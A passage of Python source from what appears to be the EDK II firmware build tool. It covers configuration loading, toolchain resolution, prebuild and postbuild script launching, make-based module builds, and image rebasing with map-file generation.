GlobalData.gEnableGenfdsMultiThread = BuildOptions.GenfdsMultiThread
if GlobalData.gBinCacheDest and not GlobalData.gUseHashCache:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination must be used together with --hash.")
if GlobalData.gBinCacheSource and not GlobalData.gUseHashCache:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-source must be used together with --hash.")
if GlobalData.gBinCacheDest and GlobalData.gBinCacheSource:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination can not be used together with --binary-source.")
if GlobalData.gBinCacheSource:
BinCacheSource = os.path.normpath(GlobalData.gBinCacheSource)
if not os.path.isabs(BinCacheSource):
BinCacheSource = mws.join(self.WorkspaceDir, BinCacheSource)
GlobalData.gBinCacheSource = BinCacheSource
else:
if GlobalData.gBinCacheSource is not None:
EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-source.")
if GlobalData.gBinCacheDest:
BinCacheDest = os.path.normpath(GlobalData.gBinCacheDest)
if not os.path.isabs(BinCacheDest):
BinCacheDest = mws.join(self.WorkspaceDir, BinCacheDest)
GlobalData.gBinCacheDest = BinCacheDest
else:
if GlobalData.gBinCacheDest is not None:
EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-destination.")
if self.ConfDirectory:
# Get alternate Conf location, if it is absolute, then just use the absolute directory name
ConfDirectoryPath = os.path.normpath(self.ConfDirectory)
if not os.path.isabs(ConfDirectoryPath):
# Since alternate directory name is not absolute, the alternate directory is located within the WORKSPACE
# This also handles someone specifying the Conf directory in the workspace. Using --conf=Conf
ConfDirectoryPath = mws.join(self.WorkspaceDir, ConfDirectoryPath)
else:
if "CONF_PATH" in os.environ:
ConfDirectoryPath = os.path.normcase(os.path.normpath(os.environ["CONF_PATH"]))
else:
# Get standard WORKSPACE/Conf use the absolute path to the WORKSPACE/Conf
ConfDirectoryPath = mws.join(self.WorkspaceDir, 'Conf')
GlobalData.gConfDirectory = ConfDirectoryPath
GlobalData.gDatabasePath = os.path.normpath(os.path.join(ConfDirectoryPath, GlobalData.gDatabasePath))
self.Db = WorkspaceDatabase()
self.BuildDatabase = self.Db.BuildObject
self.Platform = None
self.ToolChainFamily = None
self.LoadFixAddress = 0
self.UniFlag = BuildOptions.Flag
self.BuildModules = []
self.HashSkipModules = []
self.Db_Flag = False
self.LaunchPrebuildFlag = False
self.PlatformBuildPath = os.path.join(GlobalData.gConfDirectory, '.cache', '.PlatformBuild')
if BuildOptions.CommandLength:
GlobalData.gCommandMaxLength = BuildOptions.CommandLength
# print dot character during doing some time-consuming work
self.Progress = Utils.Progressor()
# print current build environment and configuration
EdkLogger.quiet("%-16s = %s" % ("WORKSPACE", os.environ["WORKSPACE"]))
if "PACKAGES_PATH" in os.environ:
# WORKSPACE env has been converted before. Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("PACKAGES_PATH", os.path.normcase(os.path.normpath(os.environ["PACKAGES_PATH"]))))
EdkLogger.quiet("%-16s = %s" % ("ECP_SOURCE", os.environ["ECP_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EDK_SOURCE", os.environ["EDK_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EFI_SOURCE", os.environ["EFI_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_PATH", os.environ["EDK_TOOLS_PATH"]))
if "EDK_TOOLS_BIN" in os.environ:
# Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_BIN", os.path.normcase(os.path.normpath(os.environ["EDK_TOOLS_BIN"]))))
EdkLogger.quiet("%-16s = %s" % ("CONF_PATH", GlobalData.gConfDirectory))
self.InitPreBuild()
self.InitPostBuild()
if self.Prebuild:
EdkLogger.quiet("%-16s = %s" % ("PREBUILD", self.Prebuild))
if self.Postbuild:
EdkLogger.quiet("%-16s = %s" % ("POSTBUILD", self.Postbuild))
if self.Prebuild:
self.LaunchPrebuild()
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
if not (self.LaunchPrebuildFlag and os.path.exists(self.PlatformBuildPath)):
self.InitBuild()
EdkLogger.info("")
os.chdir(self.WorkspaceDir)
## Load configuration
#
# This method will parse target.txt and get the build configurations.
#
def LoadConfiguration(self):
#
# Check target.txt and tools_def.txt and Init them
#
BuildConfigurationFile = os.path.normpath(os.path.join(GlobalData.gConfDirectory, gBuildConfiguration))
if os.path.isfile(BuildConfigurationFile) == True:
StatusCode = self.TargetTxt.LoadTargetTxtFile(BuildConfigurationFile)
ToolDefinitionFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_CONF]
if ToolDefinitionFile == '':
ToolDefinitionFile = gToolsDefinition
ToolDefinitionFile = os.path.normpath(mws.join(self.WorkspaceDir, 'Conf', ToolDefinitionFile))
if os.path.isfile(ToolDefinitionFile) == True:
StatusCode = self.ToolDef.LoadToolDefFile(ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=BuildConfigurationFile)
# if no ARCH given in command line, get it from target.txt
if not self.ArchList:
self.ArchList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET_ARCH]
self.ArchList = tuple(self.ArchList)
# if no build target given in command line, get it from target.txt
if not self.BuildTargetList:
self.BuildTargetList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET]
# if no tool chain given in command line, get it from target.txt
if not self.ToolChainList:
self.ToolChainList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
if self.ToolChainList is None or len(self.ToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.\n")
# check if the tool chains are defined or not
NewToolChainList = []
for ToolChain in self.ToolChainList:
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
EdkLogger.warn("build", "Tool chain [%s] is not defined" % ToolChain)
else:
NewToolChainList.append(ToolChain)
# if no tool chain available, break the build
if len(NewToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="[%s] not defined. No toolchain available for build!\n" % ", ".join(self.ToolChainList))
else:
self.ToolChainList = NewToolChainList
ToolChainFamily = []
ToolDefinition = self.ToolDef.ToolsDefTxtDatabase
for Tool in self.ToolChainList:
if TAB_TOD_DEFINES_FAMILY not in ToolDefinition or Tool not in ToolDefinition[TAB_TOD_DEFINES_FAMILY] \
or not ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool]:
EdkLogger.warn("build", "No tool chain family found in configuration for %s. Default to MSFT." % Tool)
ToolChainFamily.append(TAB_COMPILER_MSFT)
else:
ToolChainFamily.append(ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool])
self.ToolChainFamily = ToolChainFamily
if self.ThreadNumber is None:
self.ThreadNumber = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_MAX_CONCURRENT_THREAD_NUMBER]
if self.ThreadNumber == '':
self.ThreadNumber = 0
else:
self.ThreadNumber = int(self.ThreadNumber, 0)
if self.ThreadNumber == 0:
try:
self.ThreadNumber = multiprocessing.cpu_count()
except (ImportError, NotImplementedError):
self.ThreadNumber = 1
if not self.PlatformFile:
PlatformFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_ACTIVE_PLATFORM]
if not PlatformFile:
# Try to find one in current directory
WorkingDirectory = os.getcwd()
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.dsc')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_MISSING,
ExtraData="There are %d DSC files in %s. Use '-p' to specify one.\n" % (FileNum, WorkingDirectory))
elif FileNum == 1:
PlatformFile = FileList[0]
else:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="No active platform specified in target.txt or command line! Nothing can be built.\n")
self.PlatformFile = PathClass(NormFile(PlatformFile, self.WorkspaceDir), self.WorkspaceDir)
## Initialize build configuration
#
# This method will parse DSC file and merge the configurations from
# command line and target.txt, then get the final build configurations.
#
def InitBuild(self):
# parse target.txt, tools_def.txt, and platform file
self.LoadConfiguration()
# Allow case-insensitive for those from command line or configuration file
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
def InitPreBuild(self):
self.LoadConfiguration()
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = self.BuildTargetList[0]
if self.ArchList:
GlobalData.gGlobalDefines['ARCH'] = self.ArchList[0]
if self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = self.ToolChainList[0]
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = self.ToolChainList[0]
if self.ToolChainFamily:
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[0]
if 'PREBUILD' in GlobalData.gCommandLineDefines:
self.Prebuild = GlobalData.gCommandLineDefines.get('PREBUILD')
else:
self.Db_Flag = True
Platform = self.Db.MapPlatform(str(self.PlatformFile))
self.Prebuild = str(Platform.Prebuild)
if self.Prebuild:
PrebuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Prebuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PrebuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PrebuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PrebuildList.append(Arg)
self.Prebuild = ' '.join(PrebuildList)
self.Prebuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def InitPostBuild(self):
if 'POSTBUILD' in GlobalData.gCommandLineDefines:
self.Postbuild = GlobalData.gCommandLineDefines.get('POSTBUILD')
else:
Platform = self.Db.MapPlatform(str(self.PlatformFile))
self.Postbuild = str(Platform.Postbuild)
if self.Postbuild:
PostbuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Postbuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PostbuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PostbuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PostbuildList.append(Arg)
self.Postbuild = ' '.join(PostbuildList)
self.Postbuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def PassCommandOption(self, BuildTarget, TargetArch, ToolChain, PlatformFile, Target):
BuildStr = ''
if GlobalData.gCommand and isinstance(GlobalData.gCommand, list):
BuildStr += ' ' + ' '.join(GlobalData.gCommand)
TargetFlag = False
ArchFlag = False
ToolChainFlag = False
PlatformFileFlag = False
if GlobalData.gOptions and not GlobalData.gOptions.BuildTarget:
TargetFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.TargetArch:
ArchFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.ToolChain:
ToolChainFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.PlatformFile:
PlatformFileFlag = True
if TargetFlag and BuildTarget:
if isinstance(BuildTarget, list) or isinstance(BuildTarget, tuple):
BuildStr += ' -b ' + ' -b '.join(BuildTarget)
elif isinstance(BuildTarget, str):
BuildStr += ' -b ' + BuildTarget
if ArchFlag and TargetArch:
if isinstance(TargetArch, list) or isinstance(TargetArch, tuple):
BuildStr += ' -a ' + ' -a '.join(TargetArch)
elif isinstance(TargetArch, str):
BuildStr += ' -a ' + TargetArch
if ToolChainFlag and ToolChain:
if isinstance(ToolChain, list) or isinstance(ToolChain, tuple):
BuildStr += ' -t ' + ' -t '.join(ToolChain)
elif isinstance(ToolChain, str):
BuildStr += ' -t ' + ToolChain
if PlatformFileFlag and PlatformFile:
if isinstance(PlatformFile, list) or isinstance(PlatformFile, tuple):
BuildStr += ' -p ' + ' -p '.join(PlatformFile)
elif isinstance(PlatformFile, str):
BuildStr += ' -p' + PlatformFile
BuildStr += ' --conf=' + GlobalData.gConfDirectory
if Target:
BuildStr += ' ' + Target
return BuildStr
def LaunchPrebuild(self):
if self.Prebuild:
EdkLogger.info("\n- Prebuild Start -\n")
self.LaunchPrebuildFlag = True
#
# The purpose of .PrebuildEnv file is capture environment variable settings set by the prebuild script
# and preserve them for the rest of the main build step, because the child process environment will
# evaporate as soon as it exits, we cannot get it in build step.
#
PrebuildEnvFile = os.path.join(GlobalData.gConfDirectory, '.cache', '.PrebuildEnv')
if os.path.isfile(PrebuildEnvFile):
os.remove(PrebuildEnvFile)
if os.path.isfile(self.PlatformBuildPath):
os.remove(self.PlatformBuildPath)
if sys.platform == "win32":
args = ' && '.join((self.Prebuild, 'set > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
else:
args = ' && '.join((self.Prebuild, 'env > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Prebuild", PREBUILD_ERROR, 'Prebuild process is not success!')
if os.path.exists(PrebuildEnvFile):
f = open(PrebuildEnvFile)
envs = f.readlines()
f.close()
envs = itertools.imap(lambda l: l.split('=', 1), envs)
envs = itertools.ifilter(lambda l: len(l) == 2, envs)
envs = itertools.imap(lambda l: [i.strip() for i in l], envs)
os.environ.update(dict(envs))
EdkLogger.info("\n- Prebuild Done -\n")
def LaunchPostbuild(self):
if self.Postbuild:
EdkLogger.info("\n- Postbuild Start -\n")
if sys.platform == "win32":
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
else:
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Postbuild", POSTBUILD_ERROR, 'Postbuild process is not success!')
EdkLogger.info("\n- Postbuild Done -\n")
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _BuildPa(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False, FfsCommand={}):
if AutoGenObject is None:
return False
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile, FfsCommand)
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
makefile = GenMake.BuildFile(AutoGenObject)._FILE_NAME_[GenMake.gMakeType]
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build modules
if BuildModule:
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# build library
if Target == 'libraries':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# build module
if Target == 'modules':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Mod in AutoGenObject.ModuleBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Mod, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# cleanlib
if Target == 'cleanlib':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# clean
if Target == 'clean':
for Mod in AutoGenObject.ModuleBuildDirectoryList:
ModMakefile = os.path.normpath(os.path.join(Mod, makefile))
if os.path.exists(ModMakefile):
NewBuildCommand = BuildCommand + ['-f', ModMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError as X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _Build(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
if AutoGenObject is None:
return False
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
#AutoGenObject.CreateAsBuiltInf()
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
# build modules
if BuildModule:
if Target != 'fds':
BuildCommand = BuildCommand + [Target]
AutoGenObject.BuildTime = LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# genfds
if Target == 'fds':
if GenFdsApi(AutoGenObject.GenFdsCommandDict, self.Db):
EdkLogger.error("build", COMMAND_FAILURE)
return True
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build library
if Target == 'libraries':
pass
# not build modules
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError as X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Rebase module image and Get function address for the input module list.
#
def _RebaseModule (self, MapBuffer, BaseAddress, ModuleList, AddrIsOffset = True, ModeIsSmm = False):
if ModeIsSmm:
AddrIsOffset = False
for InfFile in ModuleList:
sys.stdout.write (".")
sys.stdout.flush()
ModuleInfo = ModuleList[InfFile]
ModuleName = ModuleInfo.BaseName
ModuleOutputImage = ModuleInfo.Image.FileName
ModuleDebugImage = os.path.join(ModuleInfo.DebugDir, ModuleInfo.BaseName + '.efi')
## for SMM module in SMRAM, the SMRAM will be allocated from base to top.
if not ModeIsSmm:
BaseAddress = BaseAddress - ModuleInfo.Image.Size
#
# Update Image to new BaseAddress by GenFw tool
#
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
else:
#
# Set new address to the section header only for SMM driver.
#
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
#
# Collect funtion address from Map file
#
ImageMapTable = ModuleOutputImage.replace('.efi', '.map')
FunctionList = []
if os.path.exists(ImageMapTable):
OrigImageBaseAddress = 0
ImageMap = open(ImageMapTable, 'r')
for LinStr in ImageMap:
if len (LinStr.strip()) == 0:
continue
#
# Get the preferred address set on link time.
#
if LinStr.find ('Preferred load address is') != -1:
StrList = LinStr.split()
OrigImageBaseAddress = int (StrList[len(StrList) - 1], 16)
StrList = LinStr.split()
if len (StrList) > 4:
if StrList[3] == 'f' or StrList[3] == 'F':
Name = StrList[1]
RelativeAddress = int (StrList[2], 16) - OrigImageBaseAddress
FunctionList.append ((Name, RelativeAddress))
if ModuleInfo.Arch == 'IPF' and Name.endswith('_ModuleEntryPoint'):
#
# Get the real entry point address for IPF image.
#
ModuleInfo.Image.EntryPoint = RelativeAddress
ImageMap.close()
#
# Add general information.
#
if ModeIsSmm:
MapBuffer.write('\n\n%s (Fixed SMRAM Offset, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
elif AddrIsOffset:
MapBuffer.write('\n\n%s (Fixed Memory Offset, BaseAddress=-0x%010X, EntryPoint=-0x%010X)\n' % (ModuleName, 0 - BaseAddress, 0 - (BaseAddress + ModuleInfo.Image.EntryPoint)))
else:
MapBuffer.write('\n\n%s (Fixed Memory Address, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
#
# Add guid and general seciton section.
#
TextSectionAddress = 0
DataSectionAddress = 0
for SectionHeader in ModuleInfo.Image.SectionHeaderList:
if SectionHeader[0] == '.text':
TextSectionAddress = SectionHeader[1]
elif SectionHeader[0] in ['.data', '.sdata']:
DataSectionAddress = SectionHeader[1]
if AddrIsOffset:
MapBuffer.write('(GUID=%s, .textbaseaddress=-0x%010X, .databaseaddress=-0x%010X)\n' % (ModuleInfo.Guid, 0 - (BaseAddress + TextSectionAddress), 0 - (BaseAddress + DataSectionAddress)))
else:
MapBuffer.write('(GUID=%s, .textbaseaddress=0x%010X, .databaseaddress=0x%010X)\n' % (ModuleInfo.Guid, BaseAddress + TextSectionAddress, BaseAddress + DataSectionAddress))
#
# Add debug image full path.
#
MapBuffer.write('(IMAGE=%s)\n\n' % (ModuleDebugImage))
#
# Add funtion address
#
for Function in FunctionList:
if AddrIsOffset:
MapBuffer.write(' -0x%010X %s\n' % (0 - (BaseAddress + Function[1]), Function[0]))
else:
MapBuffer.write(' 0x%010X %s\n' % (BaseAddress + Function[1], Function[0]))
ImageMap.close()
#
# for SMM module in SMRAM, the SMRAM will be allocated from base to top.
#
if ModeIsSmm:
BaseAddress = BaseAddress + ModuleInfo.Image.Size
## Collect MAP information of all FVs
#
def _CollectFvMapBuffer (self, MapBuffer, Wa, ModuleList):
if self.Fdf:
# First get the XIP base address for FV map file.
GuidPattern = re.compile("[-a-fA-F0-9]+")
GuidName = re.compile("\(GUID=[-a-fA-F0-9]+")
for FvName in Wa.FdfProfile.FvDict:
FvMapBuffer = os.path.join(Wa.FvDir, FvName + '.Fv.map')
if not os.path.exists(FvMapBuffer):
continue
FvMap = open(FvMapBuffer, 'r')
#skip FV size information
FvMap.readline()
FvMap.readline()
FvMap.readline()
FvMap.readline()
for Line in FvMap:
MatchGuid = GuidPattern.match(Line)
if MatchGuid is not None:
#
# Replace GUID with module name
#
GuidString = MatchGuid.group()
if GuidString.upper() in ModuleList:
Line = Line.replace(GuidString, ModuleList[GuidString.upper()].Name)
MapBuffer.write(Line)
#
# Add the debug image full path.
#
MatchGuid = GuidName.match(Line)
if MatchGuid is not None:
GuidString = MatchGuid.group().split("=")[1]
if GuidString.upper() in ModuleList:
MapBuffer.write('(IMAGE=%s)\n' % (os.path.join(ModuleList[GuidString.upper()].DebugDir, ModuleList[GuidString.upper()].Name + '.efi')))
FvMap.close()
## Collect MAP information of all modules
#
def _CollectModuleMapBuffer (self, MapBuffer, ModuleList):
sys.stdout.write ("Generate Load Module At Fix Address Map")
sys.stdout.flush()
PatchEfiImageList = []
PeiModuleList = {}
BtModuleList = {}
RtModuleList = {}
SmmModuleList = {}
PeiSize = 0
BtSize = 0
RtSize = 0
# reserve 4K size in SMRAM to make SMM module address not from 0.
SmmSize = 0x1000
IsIpfPlatform = False
if 'IPF' in self.ArchList:
IsIpfPlatform = True
for ModuleGuid in ModuleList:
Module = ModuleList[ModuleGuid]
GlobalData.gProcessingFile = "%s [%s, %s, %s]" % (Module.MetaFile, Module.Arch, Module.ToolChain, Module.BuildTarget)
OutputImageFile = ''
for ResultFile in Module.CodaTargetList:
if str(ResultFile.Target).endswith('.efi'):
#
# module list for PEI, DXE, RUNTIME and SMM
#
OutputImageFile = os.path.join(Module.OutputDir, Module.Name + '.efi')
ImageClass = PeImageClass (OutputImageFile)
if not ImageClass.IsValid:
EdkLogger.error("build", FILE_PARSE_FAILURE, ExtraData=ImageClass.ErrorInfo)
ImageInfo = PeImageInfo(Module.Name, Module.Guid, Module.Arch, Module.OutputDir, Module.DebugDir, ImageClass)
